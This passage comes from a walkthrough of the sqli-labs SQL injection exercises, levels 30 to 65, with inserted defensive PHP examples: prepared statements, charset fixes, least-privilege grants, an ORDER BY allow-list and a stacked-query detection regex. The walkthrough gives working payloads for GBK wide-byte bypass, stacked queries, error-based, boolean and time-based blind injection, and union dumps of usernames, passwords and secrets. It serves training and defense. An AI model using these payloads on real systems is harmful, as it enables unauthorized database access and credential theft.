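    printf("%-60s -> %s\n", $qs, $id === null ? 'reject' : "use id=$id");
}
```

The general point beyond this lab: whatever validates a value must see the same bytes, after the same decoding, as the code that consumes it. A validator that re-parses the request with its own rules is a second parser, and the gap between two parsers is exactly what parameter pollution exploits.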

 

 

 

 

 

 

Less - 30

Nothing more to say; flashy, but it had to be its own level.

Less - 31

Same as above.

Less - 32

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}


...

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

...
function strToHex($string)
{
$hex='';
for ($i=0; $i < strlen($string); $i++)
{
$hex .= dechex(ord($string[$i]));
}
return $hex;
}
echo "Hint: The Query String you input is escaped as : ".$id ."<br>";
echo "The Query String you input in Hex becomes : ".strToHex($id). "<br>";

In short, the check_addslashes function escapes backslashes, single quotes and double quotes.

The GBK encoding is obvious: wide-byte injection, nothing more to say.

payload:

http://sqli-qing.cn/sqli/Less-32/?id=-1%df%27 UNion seleCt 1,2,DATABASE()--+

Less-33

Nothing more to say.

Less-34

Just 32/33 via POST; meaningless.

Less-35

// take the variables 
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";
...
// connectivity 

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

id is not wrapped in single quotes, so addslashes has no effect.

Any of the usual payloads will do:

http://sqli-qing.cn/sqli/Less-35/?id=-1x and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

Less-36

function check_quotes($string)
{
    $string= mysql_real_escape_string($string);    
    return $string;
}

// take the variables 
if(isset($_GET['id']))
{
$id=check_quotes($_GET['id']);
//echo "The filtered request is :" .$id . "<br>";

Escaped with mysql_real_escape_string; otherwise the same, nothing more to say.

Less-37

Just the POST login version.

uname=admin%df%27 or 1=2 union select 1,database()#
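Levels 32 through 37 all rest on the same charset mismatch: the lab tells the server to use GBK with a plain SET NAMES query, but the escaping routine still inserts a lone 0x5C that the server then reads as the trailing byte of a two-byte character. The following is an added example (not the lab's code) that reproduces the lab's check_addslashes() only to show the bytes it emits, decodes them the way a GBK server does, and then shows the hardened connection and lookup; it assumes the mbstring extension, and the connection details are placeholders.

```php
<?php
// Added example (not lab code): the Less-32..Less-37 charset problem and its fix.
// check_addslashes() is the lab's function, reproduced to show the byte sequence;
// everything after it is the replacement. Connection details are hypothetical.

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);
    $string = preg_replace('/\'/i', '\\\'', $string);
    $string = preg_replace('/\"/', "\\\"", $string);
    return $string;
}

// The %df%27 payload from the post, as raw bytes (constructed input).
$input   = "-1\xDF'";
$escaped = check_addslashes($input);
echo bin2hex($escaped), "\n";                    // 2d31df5c27

// Split those bytes the way a server in GBK mode does: 0xDF is a GBK lead byte,
// so 0xDF 0x5C is one character, the backslash is consumed and the quote survives.
foreach (mb_str_split($escaped, 1, 'GBK') as $ch) {
    echo bin2hex($ch), ' ';
}
echo "\n";                                       // 2d 31 df5c 27

// Fix, part 1: set the charset through the client API. mysqli::set_charset() is
// what real_escape_string() consults; a `SET NAMES` sent as a query is invisible
// to the client library. Prefer a charset in which 0x5C is never a trailing byte.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$db = new mysqli('127.0.0.1', 'lab', 'lab-password', 'security');   // hypothetical
$db->set_charset('utf8mb4');

// Fix, part 2: do not build SQL from escaped text at all.
function fetch_user(mysqli $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;                 // "-1\xDF'" never reaches the server
    }
    $stmt = $db->prepare('SELECT username, password FROM users WHERE id = ? LIMIT 1');
    $stmt->bind_param('i', $id);     // the value travels separately from the SQL text
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}
```

The first two printed lines are the whole story of levels 32 to 37: the escaping step did what it was written to do, and the charset interpretation undid it. A bound parameter is never reinterpreted as SQL, whatever charset the connection uses, which is why part 2 is the fix that holds even if someone later changes the connection charset again.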

 

 

 

 

 

 

 

 

Less-38

Stacked injection; let's take a look.

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
    
    
    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {
        if($row = mysqli_fetch_row($result))
        {
            echo '<font size = "5" color= "#00FF00">';    
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }
//            mysqli_free_result($result);
    }
        /* print divider */
    if (mysqli_more_results($con1))
    {
            //printf("-----------------\n");
    }
     //while (mysqli_next_result($con1));
}
else 
    {
    echo '<font size="5" color= "#FFFF00">';
    print_r(mysqli_error($con1));
    echo "</font>";  
    }
/* close connection */
mysqli_close($con1);

mysqli_multi_query() executes one or more queries against the database; multiple queries are separated by semicolons. (Stacking is only possible because of this.)
After a semicolon we can add a new injected statement.

payload:

http://sqli-qing.cn/sqli/Less-38/?id=2%FE' or 1=1 %23

http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,version(),database() %23

http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

http://sqli-qing.cn/sqli/Less-38/?id=0%FE' union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
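Levels 38 through 45 exist only because the lab routes a user-derived string through mysqli_multi_query(). The following is an added example (not the lab's code) of the two defensive layers that remove the stacked-statement channel: a single-statement API with bound parameters, and a database account that could not act on a second statement even if one arrived. The connection details and the account name are placeholders.

```php
<?php
// Added example (not lab code): replacing the Less-38..Less-45 mysqli_multi_query()
// path. Layer 1 is in the application, layer 2 is in the database account.
// Connection details are hypothetical.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Layer 1: a prepared statement is one statement by construction. The server
// rejects "...; CREATE TABLE ..." at prepare time as a syntax error, and a bound
// value is never parsed as SQL, so there is no position from which a ';' can
// start a second statement. Plain mysqli_query() without the multi-statement
// connection flag behaves the same way for the text it is given.
function user_by_id(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT username, password FROM users WHERE id = ? LIMIT 1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// Layer 2 (run once by a DBA, not by the application): least privilege for the
// web account. Without CREATE, DROP, INSERT, UPDATE or FILE, the stacked
// CREATE TABLE from Less-42 and the INTO OUTFILE write from Less-7 both fail on
// permissions even if the application layer is bypassed.
const LEAST_PRIVILEGE_GRANTS = <<<'SQL'
CREATE USER IF NOT EXISTS 'webapp'@'localhost' IDENTIFIED BY '<strong password>';
GRANT SELECT ON security.users TO 'webapp'@'localhost';
SQL;

// Detection: a stacked statement leaves a ';' followed by a statement keyword in
// the logged id value, which is cheap to check in the application log.
function looks_stacked(string $value): bool
{
    return (bool) preg_match('/;\s*(create|drop|insert|update|delete|alter)\b/i', $value);
}

// Offline part of the example: classify two constructed values.
var_dump(looks_stacked("qing';create table me like users"));   // bool(true)
var_dump(looks_stacked('1'));                                   // bool(false)

// Online part, only if the hypothetical account exists.
function demo(): void
{
    $db = new mysqli('127.0.0.1', 'webapp', '<strong password>', 'security');
    $db->set_charset('utf8mb4');
    var_dump(user_by_id($db, 1));
}
```

The two layers are independent: the prepared statement stops the second statement from being parsed at all, and the GRANT means that a future code path that does concatenate text still cannot create tables or write files.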

 

 

 

 

 

 

 

 

Less-39

See 38.

Less - 40

See 38.

Less - 41

Numeric stacked injection; still see 38.

Less - 42

Still stacked:

qing';create table me like users

Less - 43

Closed with '). I really feel these levels serve no purpose.

Less - 44

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql)){
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                 return $row[1];
            }else{
                 return 0;
            }
        }
    }
}

payload:

login_user=admin&login_password=1' or '1'='1&mysubmit=login

Less - 45

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
if (@mysqli_multi_query($con1, $sql)){
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                 return $row[1];
            }else{
                 return 0;
            }
        }
    }
}

Less - 46

Now we reach ORDER BY injection; let's have a look.

$id=$_GET['sort'];    
if(isset($id))
    {
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);

    $sql = "SELECT * FROM users ORDER BY $id";
    $result = mysql_query($sql);

A simple test for ORDER BY injection: compare whether the returned data is the same for asc and desc.

http://sqli-qing.cn/sqli/Less-46/?sort=1+asc
http://sqli-qing.cn/sqli/Less-46/?sort=1+desc

A word on which injection methods work in ORDER BY.

First, error-based injection:

http://sqli-qing.cn/sqli/Less-46/?sort=1 and(updatexml(1,concat(0x7e,(select database())),0));

Blind injection also works; here XOR is used for boolean-based blind injection:

id ^(select(select version()) regexp '^5')
http://sqli-qing.cn/sqli/Less-46/?sort=1 ^(select(select version()) regexp '^5')

A brief note:

When the regexp matches, it returns 1 (00000001). That 1 is XORed with the binary value of the id column and the rows are sorted ascending by the XOR result, so the displayed order changes. When the regexp does not match, it returns 0 (00000000); a number XORed with 0 is unchanged, so the displayed order stays the same.

Time-based blind injection also works:

http://sqli-qing.cn/sqli/Less-46/?sort=if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test))

ORDER BY can also be used with a UNION:

order by id ) union(select 1,(version()),3)

One condition: there has to be a ( before it. I have seen this in CTFs, never in a real engagement.
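The sort parameter of levels 46 through 53 is an identifier, not a value, so it cannot be bound as a parameter; the only robust fix is a fixed map from what the client may send to what the query may contain. The following is an added example (not the lab's code) of that allow-list, using column names instead of the lab's numeric positions; the probes it is run against are taken from this page and the column list is an assumption for the lab's users table.

```php
<?php
// Added example (not lab code): allow-listed ORDER BY for the Less-46..Less-53
// sort parameter. The request may pick an entry; it never contributes text.

const SORTABLE = [
    'id'       => 'id',
    'username' => 'username',
];
const DIRECTIONS = ['asc' => 'ASC', 'desc' => 'DESC'];

// Returns the ORDER BY clause, or null when the request is not on the list.
// Every character of the result comes from the two constant maps above, so
// `1 and updatexml(...)`, `1 ^ (select ...)` or `if(..., sleep(5))` have no way in.
function order_clause(string $sort, string $dir = 'asc'): ?string
{
    $col = SORTABLE[strtolower($sort)] ?? null;
    $d   = DIRECTIONS[strtolower($dir)] ?? null;
    if ($col === null || $d === null) {
        return null;
    }
    return "ORDER BY `$col` $d";
}

// Query helper: an unknown sort key falls back to a fixed order rather than
// being passed through. Rejecting the request with a 400 is equally valid.
function list_users(mysqli $db, string $sort, string $dir): array
{
    $clause = order_clause($sort, $dir) ?? 'ORDER BY `id` ASC';
    $res = $db->query("SELECT username FROM users $clause");
    return $res->fetch_all(MYSQLI_ASSOC);
}

// Constructed inputs: the walkthrough's own probes and two legitimate keys.
$probes = [
    '1 and(updatexml(1,concat(0x7e,(select database())),0))',
    "1 ^(select(select version()) regexp '^5')",
    'if(1=2,1,(SELECT(1)FROM(SELECT(SLEEP(5)))test))',
    'username',
    'id',
];
foreach ($probes as $p) {
    printf("%-60s -> %s\n", $p, order_clause($p, 'desc') ?? 'reject');
}
```

The asc/desc test described above still works as a detection heuristic from the outside, but on the server side the allow-list makes it moot: there is no expression evaluation for the sort order to depend on.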

 

 

 

 

Less - 47

Closed with a single quote; see 46.

Less - 48

This level is blind; see 46.

Less - 49

$sql = "SELECT * FROM users ORDER BY '$id'";
$result = mysql_query($sql);
if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['username'];
        echo $row['password'];
    }   
}

Less - 50

Numeric; see 46.

Less - 51

Less - 52

Less - 53

All of these can follow 46; the differences are really too small, pointless levels.

Less 54

Nothing special about this level, except that the number of queries is limited; the section below key exists to control the query count, and the table and column names are random.

// Querry DB to get the correct output
            $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
...
$key = addslashes($_POST['key']);
    $key = mysql_real_escape_string($key);
    //echo $key;
    //Query table to verify your result
    $sql="SELECT 1 FROM $table WHERE $col1= '$key'";
    //echo "$sql";
    $result=mysql_query($sql)or die("error in submittion of Key Solution".mysql_error());
     
    $row = mysql_fetch_array($result);

payload:

http://sqli-qing.cn/sqli/Less-54/?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+

http://sqli-qing.cn/sqli/Less-54/?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='qing' --+

http://sqli-qing.cn/sqli/Less-54/?id=0' union select 1,group_concat(secret_qing),group_concat(sessid) from challenges.qing --+

First, the database name is known: challenges

Query the table name:

http://sqli-qing.cn/sqli/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

Column names and the rest need no further explanation:

id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='842yxlmx7h'--+
http://sqli-qing.cn/sqli/Less-54/?id=-1'union select 1,2,group_concat(secret_KOB8) from challenges.842yxlmx7h--+

Less - 55

Same as Less 54; based on parentheses.

Less - 56

Same as Less 54; parentheses plus single quote.

Less - 57

Same as Less 54; double-quoted string type. Pointless.

Less - 58

A small difference: from this level on the query results are not displayed, so union select cannot be used; use error-based injection instead.

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='7mu71b84nt'),0x7e))--

Less - 59

Less - 60

Nothing more to say; see 58.

Less - 61

-1')) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

Less - 62

Here neither union injection nor error-based injection works.

Blind injection; nothing more to say.

)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+

Less - 63

Less - 64

LESS-65

Different closing; same method as 62.

Done. Written during the National Day holiday with a bit of a cold; off I go.
 
